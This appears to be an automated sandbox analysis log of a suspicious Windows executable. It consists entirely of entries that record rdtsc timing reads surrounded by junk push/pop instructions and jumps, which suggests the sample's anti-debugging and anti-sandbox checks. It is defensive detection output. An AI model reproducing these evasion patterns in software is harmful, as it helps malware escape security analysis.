              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFE4 second address: F4EFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFED second address: F4F003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F88DD0CB14Dh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F003 second address: F4F029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F88DC6CD042h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F308 second address: F4F30C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F30C second address: F4F316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F316 second address: F4F31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F539FB second address: F53A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F88DC6CD036h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A05 second address: F53A13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F88DD0CB146h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A13 second address: F53A38 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F88DC6CD036h 0x00000008 jmp 00007F88DC6CD045h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A38 second address: F53A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A3E second address: F53A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A42 second address: F53A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A48 second address: F53A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F88DC6CD036h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A5C second address: F53A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F88DD0CB146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A66 second address: F53A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ECA043 second address: ECA06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F88DD0CB155h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ECA06C second address: ECA072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F585B6 second address: F585C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F88DD0CB146h 0x00000008 jc 00007F88DD0CB146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F58744 second address: F58755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F88DC6CD03Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AFAD second address: F5AFB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC29 second address: F5AC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC2D second address: F5AC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F88DD0CB146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC3D second address: F5AC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F88DC6CD036h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC47 second address: F5AC66 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88DD0CB146h 0x00000008 jmp 00007F88DD0CB155h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC66 second address: F5AC89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F88DC6CD041h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnl 00007F88DC6CD036h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5A3 second address: FED5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5A9 second address: FED5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5AD second address: FED5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5BA second address: FED5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED6EC second address: FED6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007F88DC6CD036h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED6FD second address: FED702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED702 second address: FED724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD040h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F88DC6CD038h 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED854 second address: FED85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED85F second address: FED86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD03Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED86F second address: FED882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDB9D second address: FEDBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD041h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDBB9 second address: FEDBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDED1 second address: FEDEDF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F88DC6CD038h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDEDF second address: FEDEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDEE3 second address: FEDEE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDEE7 second address: FEDEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE034 second address: FEE03A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE03A second address: FEE052 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F88DD0CB14Eh 0x00000008 jne 00007F88DD0CB146h 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F88DD0CB14Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE178 second address: FEE17E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE17E second address: FEE193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB151h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE193 second address: FEE19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE19D second address: FEE1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF1188 second address: FF118E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF118E second address: FF1193 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3D71 second address: FF3DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F88DC6CD045h 0x0000000a popad 0x0000000b push eax 0x0000000c ja 00007F88DC6CD040h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jc 00007F88DC6CD040h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3DAB second address: FF3DBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F88DD0CB146h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3FEE second address: FF3FF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3FF4 second address: FF4004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DD0CB14Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF4004 second address: FF4044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD047h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and edx, 216C8860h 0x00000012 push dword ptr [ebp+122D3008h] 0x00000018 mov dh, cl 0x0000001a call 00007F88DC6CD039h 0x0000001f push esi 0x00000020 push edi 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pop esi 0x00000025 push eax 0x00000026 pushad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF4044 second address: FF405C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F88DD0CB14Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF405C second address: FF4060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF5956 second address: FF5972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB158h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF5507 second address: FF5511 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F88DC6CD036h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF5511 second address: FF5531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F88DD0CB15Ah 0x0000000c jmp 00007F88DD0CB154h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF7495 second address: FF749D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF749D second address: FF74B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F88DD0CB146h 0x0000000d jc 00007F88DD0CB146h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203B0 second address: 53203B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203B4 second address: 53203CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203CA second address: 53203D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203D0 second address: 53203D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203D4 second address: 5320481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov dx, cx 0x0000000d pushfd 0x0000000e jmp 00007F88DC6CD040h 0x00000013 and eax, 7F4B52A8h 0x00000019 jmp 00007F88DC6CD03Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 mov al, ACh 0x00000026 mov eax, edx 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F88DC6CD043h 0x00000030 mov edx, dword ptr [ebp+0Ch] 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F88DC6CD044h 0x0000003a and cx, E768h 0x0000003f jmp 00007F88DC6CD03Bh 0x00000044 popfd 0x00000045 pushfd 0x00000046 jmp 00007F88DC6CD048h 0x0000004b sub ax, 39C8h 0x00000050 jmp 00007F88DC6CD03Bh 0x00000055 popfd 0x00000056 popad 0x00000057 mov ecx, dword ptr [ebp+08h] 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5320481 second address: 5320485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5320485 second address: 532048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 532048B second address: 5320491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 534073B second address: 5340753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DC6CD044h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340753 second address: 5340771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F88DD0CB153h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340771 second address: 5340778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340778 second address: 534078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F88DD0CB14Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 534078E second address: 5340794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340794 second address: 5340798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340798 second address: 53407E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, C72Ah 0x0000000f mov ebx, 24E82BF6h 0x00000014 popad 0x00000015 push esp 0x00000016 pushad 0x00000017 jmp 00007F88DC6CD048h 0x0000001c mov ch, EBh 0x0000001e popad 0x0000001f mov dword ptr [esp], ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F88DC6CD048h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53407E7 second address: 53407F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DD0CB14Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53407F9 second address: 5340876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov eax, 6CDDBBF9h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F88DC6CD03Bh 0x00000016 sbb eax, 5B83CBEEh 0x0000001c jmp 00007F88DC6CD049h 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp], esi 0x00000027 jmp 00007F88DC6CD03Eh 0x0000002c lea eax, dword ptr [ebp-04h] 0x0000002f pushad 0x00000030 mov al, BEh 0x00000032 pushad 0x00000033 jmp 00007F88DC6CD049h 0x00000038 mov eax, 5A620647h 0x0000003d popad 0x0000003e popad 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340876 second address: 534087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 534087A second address: 5340880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340880 second address: 5340886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340886 second address: 53408A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F88DC6CD03Fh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408A5 second address: 53408A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408A9 second address: 53408AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408AF second address: 53408B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408B5 second address: 53408B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340914 second address: 534091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409E3 second address: 53409E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409E9 second address: 53409ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409ED second address: 53409FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409FC second address: 5340A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
